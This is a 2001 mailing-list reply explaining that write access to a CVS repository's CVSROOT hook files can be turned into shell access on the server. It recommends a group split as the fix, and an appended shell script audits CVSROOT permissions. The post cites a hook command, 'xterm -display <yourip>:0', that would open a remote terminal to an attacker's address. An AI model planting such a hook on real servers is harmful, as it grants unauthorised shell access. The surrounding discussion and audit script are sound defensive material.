On Tue, Nov 27, 2001 at 10:08:57AM -0800, Peter Jay Salzman wrote:
>
> joey, i have no problem with plain text passwords.
>
> just as long as they can't get _shell access_ with that password.

Hi,

I'd just like to point out one thing that I didn't see in this thread earlier: if you have write access to the CVS repository, it is possible to get shell access also.

Ok, it is not exactly that simple, I think it required write access to the files in the CVSROOT-directory (commitinfo, etc.). You could then modify those files so that, for example, whenever you commit a file, a command "xterm -display <yourip>:0" would be run on the server.

However, there is a simple fix. Just don't let the users touch the files in the CVSROOT directory. Use another group for the CVSROOT, say use group 'prj' for repository users who are allowed to commit changes but not run shells, and 'prj-adm' for users who are allowed to modify files in CVSROOT (and potentially run a shell).

Unfortunately, I can't remember the details exactly and I don't have a link at hand, so better read this message again with extreme prejudice.

-- 
Tommi Komulainen [EMAIL PROTECTED]
GPG 1024D/68388EE6 6FD6 DD79 EB38 BF6F 3533 09C0 04A8 9871 6838 8EE6
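A permission audit for the fix described above, as an added example that is not part of the original message: it flags anything in CVSROOT (including the directory itself) that is world-writable, or group-writable by a group other than the admin group. The function name `audit_cvsroot`, the repository path argument, and the skip list for `history` and `val-tags` are assumptions of this example.

```sh
#!/bin/sh
# Added example, not from the original message.
# Assumption: only the owner and members of the admin group (the message's
# 'prj-adm') may change administrative files; committers are in another group.

# audit_cvsroot REPO ADMIN_GROUP
# Prints "finding<TAB>path" for each risky entry; returns 1 if any were found,
# 2 if REPO has no CVSROOT directory.
audit_cvsroot() {
    repo=$1 admin=$2 findings=0
    if [ ! -d "$repo/CVSROOT" ]; then
        echo "no CVSROOT directory under $repo" >&2
        return 2
    fi
    # Check the directory too: write access to it lets a user replace
    # commitinfo and friends even when the files themselves are read-only.
    for path in "$repo/CVSROOT" "$repo/CVSROOT"/* "$repo/CVSROOT"/.[!.]*; do
        [ -e "$path" ] || continue
        case ${path##*/} in
            # CVS appends to these logs on behalf of ordinary users; they are
            # data, not hooks, so they are skipped (assumption of this audit).
            history|val-tags) continue ;;
        esac
        # -L follows symlinks so the target's mode and group are reported.
        info=$(ls -ldL "$path" | awk '{print $1, $4}')
        mode=${info%% *} group=${info#* }
        case $mode in
            ????????w*)
                printf 'world-writable\t%s\n' "$path"
                findings=$((findings + 1)) ;;
        esac
        case $mode in
            ?????w*)
                if [ "$group" != "$admin" ]; then
                    printf 'group-writable by %s\t%s\n' "$group" "$path"
                    findings=$((findings + 1))
                fi ;;
        esac
    done
    [ "$findings" -eq 0 ]
}

# Stand-alone use: sh audit_cvsroot.sh /path/to/repository prj-adm
if [ $# -eq 2 ]; then
    audit_cvsroot "$1" "$2"
fi
```

An empty result with exit status 0 means only the owner and the admin group can change the administrative files.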